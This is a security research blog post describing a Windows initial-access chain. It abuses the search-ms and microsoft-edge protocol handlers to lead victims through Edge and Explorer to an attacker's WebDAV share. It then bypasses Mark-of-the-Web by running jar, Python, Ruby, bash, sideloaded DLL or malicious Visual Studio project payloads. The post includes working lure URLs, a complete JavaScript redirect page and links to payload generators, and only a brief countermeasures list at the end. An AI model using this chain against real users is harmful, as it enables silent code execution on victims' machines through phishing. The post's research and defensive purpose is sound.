Providing an URL like this will do some unexpected behaviour under an actual Windows OS.

search-ms:query=poc&crumb=location:\\dbexport.zip\notagain&displayname=ClickOneOfU

Opening the link will push the Windows explorer to open the WebDAV dbexport.zip via http, filtering on a special name or filetype and hide the path with the displayname value.

This will not work under Firefox, which we can either ignore, or go for the next step and first open the URL in Edge.

Connecting to a WebDAV server

Connecting to a WebDAV server

How it might look from our PoC state Note that the “payload” ThisIsFine.exe is not shown here!

This will also start the Webclient service, which can be used to some AD attacks, but that’s not the focus here

Micrososft-Edge

microsoft-edge:https://poc.dbexport.zip

will ask the user to open the URL in Microsoft’s Edge, which then will support the search-ms feature.

Avoid MotW

If we have the stuff above ready, a victim will be on a WebDAV server, filtered on some files.

From now on we have some good options. We can either use some Sideloading stuff to avoid SmartScreen and MotW, like AppDomainManager-Injection.

Or we can rely on programs, that do not propagate MotW like some programming engines like Java, Python, Ruby, ... or also directly Microsofts Visual Studio.

Sideloading

For sideloading we can use e.g. appDomainManager-Injection. A well sampled list of possible candidates can be found here. https://github.com/Mr-Un1k0d3r/.NetConfigLoader

Basically we just need a signed .exe and a .exe.conf file next to it, to load a dll of our choice. This can even be from a remote location, but as we already are on a remote WebDAV, we can just place it there.

This will still trigger one Warning

Java

As already stated here: https://badoption.eu/blog/2023/06/01/zipjar.html Java does not honour Mark-of-the-Web (MotW). Because of that, we can simply place a jar file there and a double click will execute it.

Execution of a jar

Bash

If there is a bash registered, e.g. for .sh files also this bypasses MotW.

You might ask, “who the hell installs a bash under Windows?” The git package does it! So if you installed the git package via Winget or as dependency the chances are high that this is working.

winget install git.git

Execution via a bash script

Python, Ruby, …

Most of the third party languages like Python, Ruby, Java, … do not honour MotW.

Here is a PoC for Python: Execution of a py script

and a PoC for Ruby

Execution of a rb script

To simplify the creation of the PoCs both just trigger a binary housing next to the scripts, which is also quite interesting.

Cool, now we have everything ready for our fist PoC!

Visual Studio

A MOTW Bypass for Visual Studio projects, resulting in code execution.

The Blogpost here https://github.com/cjm00n/EvilSln explaining a possibility to add a malicious .suo file to a SLN project file. This would result in RCE if the project is opened.

An attacker could combine this with a WebDAV and host a malicious Visual studio project there. As Visual Studio by default ignores MoTW and there is also no protection (Smartscreen, etc.) for SLN files in place, this results in code execution without warnings and a double click.

Host it on a WebDAV folder and you can just double click the .sln. Note that there is also a generator for payloads https://github.com/moom825/visualstudio-suo-exploit. I did not check the code in detail, so absolute without guarantees.

Execution via visual studio

Execution via visual studio

It is strange, that MS did not activate the MotW for Visual Studio by default. My guess would be that it is necessary for some feature to work.

Sad Clippy noises
Sad Clippy noises

Complete the chain

Having everything in place results for a little bit strange chain, steering the user to MS Edge -> Explorer -> Search -> WebDAV -> Code execution

We can use JavaScript to control the flow with something like this:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Browser Check</title>
</head>
<body>
<script>
var isEdge = navigator.userAgent.indexOf("Edg") !== -1;
if (isEdge) {
    // Code to execute if the browser is Microsoft Edge
    console.log("This is Microsoft Edge");
    var url = "search-ms:query=poc&crumb=location:\\\\dbexport.zip\\notagain&displayname=ClickOneOfUs";
    window.location.href = url;
} else {
    // Code to execute if the browser is not Microsoft Edge
    var url = "microsoft-edge:https://dbexport.zip/redir.html";
    window.location.href = url;
}
</script>
</body>
</html>

PoC for Python

Quick Walkthrough with a py file

PoC for Visual Studio

Quick Walkthrough with a sln file

The error message from Visual Studio is not a must and can be avoided if a real project is set up

Conclusion

The protocol handler still bring some surprises and have been used in recent initial access chains quite a lot.

search-ms and microsoft-edge handlers are also part of the great https://binary-offensive.com/initial-access-training training!

IMHO it is surprising, that Microsoft did not put the same protections in place for .sln, .py, .rb files as for their own things, e.g. .vbs, .js are triggering an additional warning before opening.

Countermeasures and indicators

• Check the default applications registered, specially those with an URL handler
• Register other default applications like notepad for .py, .rb, …
• Block WebDAV connections

Links

Work and inspiration from others:

• https://www.trellix.com/about/newsroom/stories/research/beyond-file-search-a-novel-method/
• https://twitter.com/hackerfantastic/status/1531793396423176193
• https://learn.microsoft.com/en-us/windows/win32/search/-search-3x-wds-qryidx-searchms